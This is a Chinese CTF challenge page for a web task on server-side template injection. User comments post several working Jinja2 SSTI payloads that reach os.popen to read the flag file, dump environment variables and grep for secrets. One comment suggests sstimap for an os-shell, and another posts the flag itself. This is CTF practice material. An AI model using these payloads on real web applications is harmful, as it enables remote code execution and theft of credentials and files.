Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16022
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态

18396143720 攻破了该题 3天前

sssqh 攻破了该题 3天前

safeline 攻破了该题 5天前

a1451753998 攻破了该题 7天前

Jiangzuo 攻破了该题 7天前

贺淑敏 攻破了该题 9天前

小敏bebe 攻破了该题 9天前

Hehe0619 攻破了该题 9天前

merrymu 攻破了该题 11天前

大棕兔爸爸 攻破了该题 12天前

qidianzhi 攻破了该题 13天前

julianus 攻破了该题 13天前

网络安全亮 攻破了该题 13天前

叶南山L 攻破了该题 14天前

跃迁ctfer 攻破了该题 15天前

maomaoht 攻破了该题 18天前

aaaaab 攻破了该题 18天前

2606579533 攻破了该题 20天前

千机www 攻破了该题 21天前

评论
wywitkey 1月前
举报
前面说的都对,这道题在ssti里比较简单,推荐使用sstimap,可以一把梭,直接出os-shell
HK1ng 3月前
举报
详解:https://blog.csdn.net/m0_59527104/article/details/147013776
smtall 3月前
举报
flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}
hao7 7月前
举报
?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}
超爱西西鸭 10月前
举报
/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}
pettter 11月前
举报
?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}
不会写代码的菜鸟 1年前
举报
大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀
qingchuan 11月前
举报
因为没有import os,os是未定义的
q1152874733 1年前
举报
http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}
Royic 1年前
举报
/?flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}
sz007 1年前
举报
flag{6c85015e98aa08e245d15289704dfd8b}